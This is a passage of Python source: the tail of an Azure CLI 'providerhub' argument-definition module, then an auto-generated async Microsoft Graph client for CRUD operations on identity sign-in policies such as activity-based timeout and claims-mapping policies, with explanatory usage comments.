help='Allows RPs to set individual limits for different actions in terms of number of requests or number of resources (for collection read requests only).')
c.argument('required_features', action=AddRequiredFeatures, nargs='+',
help='If specified, only subscriptions registered to the corresponding feature flag will be allowed.')
        c.argument('required_features_policy', arg_type=get_enum_type(['Any', 'All']), help='The accepted values are "Any" or "All". If the value is "All", then only the subscriptions registered to all the corresponding feature flags will be allowed.', arg_group='Features Rule')
        c.argument('enable_async_operation', arg_type=get_three_state_flag(),
                   help='Indicates whether the async operation is enabled for this resource type.')
        c.argument('enable_third_party_s2s', arg_type=get_three_state_flag(),
                   help='Indicates whether to enable third-party service-to-service (S2S) calls.')
c.argument('is_pure_proxy', arg_type=get_three_state_flag(),
help='Indicates whether this is a "PureProxy" resource type.')
c.argument('identity_management', action=AddIdentityManagement, nargs='+',
help='MSI related settings. RPaaS supports Managed Identity and can help simplify the onboarding process.')
c.argument('check_name_availability_specifications', action=AddCheckNameAvailabilitySpecifications, nargs='+',
help='RPaaS provides this feature at the platform level to help UserRPs with name availability checks without calling into the POST extension endpoints for the "checkNameAvailability" resource type.')
c.argument('disallowed_action_verbs', nargs='+',
help='The supported values are "read", "write", "delete", "action". This setting will block all operations of the specified type on the resource type. These actions map to the corresponding HTTP verbs.')
c.argument('service_tree_infos', action=AddResourcetyperegistrationServiceTreeInfos,
nargs='+', help='The ServiceTree information for the resource provider.')
c.argument('opt_in_headers', arg_type=get_enum_type(['NotSpecified', 'SignedUserToken',
'ClientGroupMembership', 'SignedAuxiliaryTokens',
'UnboundedClientGroupMembership']), help='ARM allows customized headers when sending requests to the RP. This can be done both at the provider level or at the individual resource type level.',
arg_group='Request Header Options')
c.argument('subscription_state_rules', action=AddSubscriptionStateRules,
nargs='+', help='The subscription policy.')
c.argument('template_deployment_options', action=AddTemplateDeploymentOptions,
nargs='+', help='The field for preflight options.')
c.argument('extended_locations', action=AddExtendedLocations,
nargs='+', help='The extended locations property.')
c.argument('resource_move_policy', action=AddResourceMovePolicy, nargs='+',
help='Indicates the resource type has opted in to move operations.')
c.argument('resource_deletion_policy', arg_type=get_enum_type(['NotSpecified', 'CascadeDeleteAll',
'CascadeDeleteProxyOnlyChildren']), help='The property to customize RPaaS deletion operation.')
with self.argument_context('providerhub resource-type-registration delete') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('resource_type', type=str,
help='The resource type.', id_part='child_name_1')
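# The action classes imported above (AddCanary, AddSkipRegions, and the rest) live in
# azext_providerhub.action and are not shown here. The following is a minimal, hypothetical
# sketch of how such a generated argparse action typically turns the space-separated
# key=value tokens accepted via nargs='+' into a structured value. The class name
# AddKeyValuePairs and its dict-merging behavior are assumptions for illustration,
# not the actual azext_providerhub.action code.

```python
import argparse


class AddKeyValuePairs(argparse.Action):
    """Hypothetical sketch: merge space-separated key=value tokens into a dict."""

    def __call__(self, parser, namespace, values, option_string=None):
        # Start from any value already parsed for this dest, so repeated flags merge.
        result = getattr(namespace, self.dest, None) or {}
        for token in values:
            key, sep, value = token.partition('=')
            if not sep:
                # Reject tokens that are not key=value pairs.
                raise argparse.ArgumentError(self, 'expected key=value, got: ' + token)
            result[key] = value
        setattr(namespace, self.dest, result)


parser = argparse.ArgumentParser()
parser.add_argument('--canary', action=AddKeyValuePairs, nargs='+')
args = parser.parse_args(['--canary', 'regions=eastus2euap', 'skip-regions=brazilus'])
print(args.canary)  # {'regions': 'eastus2euap', 'skip-regions': 'brazilus'}
```

# In the real extension, `az providerhub custom-rollout create --canary ...` routes the
# token list through the corresponding action class in the same way.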
62d55559689ecca917a2f91716ecbd0fd00ba734 | 121,233 | py | Python | msgraph/cli/command_modules/identitysignins/azext_identitysignins/vendored_sdks/identitysignins/aio/operations/_policies_operations.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | ["MIT"]
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class policiesOperations:
"""policiesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~identity_sign_ins.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_activity_based_timeout_policies(
self,
orderby: Optional[List[Union[str, "models.Enum114"]]] = None,
select: Optional[List[Union[str, "models.Enum115"]]] = None,
expand: Optional[List[Union[str, "models.Enum116"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionofactivitybasedtimeoutpolicy"]:
"""Get activityBasedTimeoutPolicies from policies.
Get activityBasedTimeoutPolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum114]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum115]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum116]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either collectionofactivitybasedtimeoutpolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofactivitybasedtimeoutpolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionofactivitybasedtimeoutpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_activity_based_timeout_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionofactivitybasedtimeoutpolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies'} # type: ignore
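# Usage sketch (hypothetical; assumes an authenticated async client has been
# constructed elsewhere as `client`, with this operations group exposed as
# `client.policies` -- the attribute name is illustrative, not guaranteed):
#
#     async for policy in client.policies.list_activity_based_timeout_policies(
#             select=["id", "displayName"]):
#         print(policy.id)
#
# The returned AsyncItemPaged follows @odata.nextLink transparently via
# get_next/extract_data above, so callers iterate once over all pages instead
# of paging manually.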
async def create_activity_based_timeout_policies(
self,
body: "models.microsoftgraphactivitybasedtimeoutpolicy",
**kwargs
) -> "models.microsoftgraphactivitybasedtimeoutpolicy":
"""Create new navigation property to activityBasedTimeoutPolicies for policies.
Create new navigation property to activityBasedTimeoutPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphactivitybasedtimeoutpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphactivitybasedtimeoutpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphactivitybasedtimeoutpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphactivitybasedtimeoutpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_activity_based_timeout_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphactivitybasedtimeoutpolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphactivitybasedtimeoutpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies'} # type: ignore
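# Usage sketch (hypothetical; the constructor keyword names below are
# assumptions for illustration, not confirmed fields of this generated model):
#
#     body = models.microsoftgraphactivitybasedtimeoutpolicy(
#         display_name="Example timeout policy",  # illustrative value
#     )
#     created = await client.policies.create_activity_based_timeout_policies(body)
#
# Only a 201 response is accepted; any other status is routed through
# map_error and raises HttpResponseError with the deserialized odataerror
# attached as `model`.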
async def get_activity_based_timeout_policies(
self,
activity_based_timeout_policy_id: str,
select: Optional[List[Union[str, "models.Enum117"]]] = None,
expand: Optional[List[Union[str, "models.Enum118"]]] = None,
**kwargs
) -> "models.microsoftgraphactivitybasedtimeoutpolicy":
"""Get activityBasedTimeoutPolicies from policies.
Get activityBasedTimeoutPolicies from policies.
:param activity_based_timeout_policy_id: key: id of activityBasedTimeoutPolicy.
:type activity_based_timeout_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum117]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum118]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphactivitybasedtimeoutpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphactivitybasedtimeoutpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphactivitybasedtimeoutpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_activity_based_timeout_policies.metadata['url'] # type: ignore
path_format_arguments = {
'activityBasedTimeoutPolicy-id': self._serialize.url("activity_based_timeout_policy_id", activity_based_timeout_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphactivitybasedtimeoutpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies/{activityBasedTimeoutPolicy-id}'} # type: ignore
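# The optional `cls` keyword receives (pipeline_response, deserialized,
# response_headers) and its return value replaces the deserialized model.
# A hedged sketch (client name is illustrative):
#
#     def raw_and_model(pipeline_response, deserialized, headers):
#         return pipeline_response.http_response.status_code, deserialized
#
#     status, policy = await client.policies.get_activity_based_timeout_policies(
#         "00000000-0000-0000-0000-000000000000",  # placeholder policy id
#         cls=raw_and_model,
#     )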
async def update_activity_based_timeout_policies(
self,
activity_based_timeout_policy_id: str,
body: "models.microsoftgraphactivitybasedtimeoutpolicy",
**kwargs
) -> None:
"""Update the navigation property activityBasedTimeoutPolicies in policies.
Update the navigation property activityBasedTimeoutPolicies in policies.
:param activity_based_timeout_policy_id: key: id of activityBasedTimeoutPolicy.
:type activity_based_timeout_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphactivitybasedtimeoutpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_activity_based_timeout_policies.metadata['url'] # type: ignore
path_format_arguments = {
'activityBasedTimeoutPolicy-id': self._serialize.url("activity_based_timeout_policy_id", activity_based_timeout_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphactivitybasedtimeoutpolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies/{activityBasedTimeoutPolicy-id}'} # type: ignore
async def delete_activity_based_timeout_policies(
self,
activity_based_timeout_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property activityBasedTimeoutPolicies for policies.
Delete navigation property activityBasedTimeoutPolicies for policies.
:param activity_based_timeout_policy_id: key: id of activityBasedTimeoutPolicy.
:type activity_based_timeout_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_activity_based_timeout_policies.metadata['url'] # type: ignore
path_format_arguments = {
'activityBasedTimeoutPolicy-id': self._serialize.url("activity_based_timeout_policy_id", activity_based_timeout_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies/{activityBasedTimeoutPolicy-id}'} # type: ignore
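# Usage sketch for optimistic concurrency (hypothetical client name): pass the
# ETag captured from a prior read as `if_match`, which is sent as an If-Match
# header so the delete only succeeds if the policy is unchanged since that read:
#
#     etag = "..."  # ETag value obtained from an earlier GET response
#     await client.policies.delete_activity_based_timeout_policies(
#         policy_id, if_match=etag)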
def list_claims_mapping_policies(
self,
orderby: Optional[List[Union[str, "models.Enum119"]]] = None,
select: Optional[List[Union[str, "models.Enum120"]]] = None,
expand: Optional[List[Union[str, "models.Enum121"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionofclaimsmappingpolicy"]:
"""Get claimsMappingPolicies from policies.
Get claimsMappingPolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum119]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum120]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum121]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either collectionofclaimsmappingpolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofclaimsmappingpolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionofclaimsmappingpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_claims_mapping_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionofclaimsmappingpolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies'} # type: ignore
async def create_claims_mapping_policies(
self,
body: "models.microsoftgraphclaimsmappingpolicy",
**kwargs
) -> "models.microsoftgraphclaimsmappingpolicy":
"""Create new navigation property to claimsMappingPolicies for policies.
Create new navigation property to claimsMappingPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphclaimsmappingpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphclaimsmappingpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphclaimsmappingpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphclaimsmappingpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_claims_mapping_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphclaimsmappingpolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphclaimsmappingpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies'} # type: ignore
async def get_claims_mapping_policies(
self,
claims_mapping_policy_id: str,
select: Optional[List[Union[str, "models.Enum122"]]] = None,
expand: Optional[List[Union[str, "models.Enum123"]]] = None,
**kwargs
) -> "models.microsoftgraphclaimsmappingpolicy":
"""Get claimsMappingPolicies from policies.
Get claimsMappingPolicies from policies.
:param claims_mapping_policy_id: key: id of claimsMappingPolicy.
:type claims_mapping_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum122]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum123]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphclaimsmappingpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphclaimsmappingpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphclaimsmappingpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_claims_mapping_policies.metadata['url'] # type: ignore
path_format_arguments = {
'claimsMappingPolicy-id': self._serialize.url("claims_mapping_policy_id", claims_mapping_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphclaimsmappingpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies/{claimsMappingPolicy-id}'} # type: ignore
async def update_claims_mapping_policies(
self,
claims_mapping_policy_id: str,
body: "models.microsoftgraphclaimsmappingpolicy",
**kwargs
) -> None:
"""Update the navigation property claimsMappingPolicies in policies.
Update the navigation property claimsMappingPolicies in policies.
:param claims_mapping_policy_id: key: id of claimsMappingPolicy.
:type claims_mapping_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphclaimsmappingpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_claims_mapping_policies.metadata['url'] # type: ignore
path_format_arguments = {
'claimsMappingPolicy-id': self._serialize.url("claims_mapping_policy_id", claims_mapping_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphclaimsmappingpolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies/{claimsMappingPolicy-id}'} # type: ignore
async def delete_claims_mapping_policies(
self,
claims_mapping_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property claimsMappingPolicies for policies.
Delete navigation property claimsMappingPolicies for policies.
:param claims_mapping_policy_id: key: id of claimsMappingPolicy.
:type claims_mapping_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_claims_mapping_policies.metadata['url'] # type: ignore
path_format_arguments = {
'claimsMappingPolicy-id': self._serialize.url("claims_mapping_policy_id", claims_mapping_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies/{claimsMappingPolicy-id}'} # type: ignore
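# Error-handling sketch: a 404 is mapped through error_map to
# ResourceNotFoundError before the generic HttpResponseError path, so callers
# can treat "already deleted" as success (client name is illustrative):
#
#     from azure.core.exceptions import ResourceNotFoundError
#     try:
#         await client.policies.delete_claims_mapping_policies(policy_id)
#     except ResourceNotFoundError:
#         pass  # policy was already gone
#
# Every operation also accepts an `error_map` keyword whose entries are merged
# over the defaults (401/404/409) to customize which exception a status raises.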
def list_conditional_access_policies(
self,
orderby: Optional[List[Union[str, "models.Enum124"]]] = None,
select: Optional[List[Union[str, "models.Enum125"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["models.collectionofconditionalaccesspolicy0"]:
"""Get conditionalAccessPolicies from policies.
Get conditionalAccessPolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum124]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum125]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either collectionofconditionalaccesspolicy0 or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofconditionalaccesspolicy0]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionofconditionalaccesspolicy0"]
error_map = {
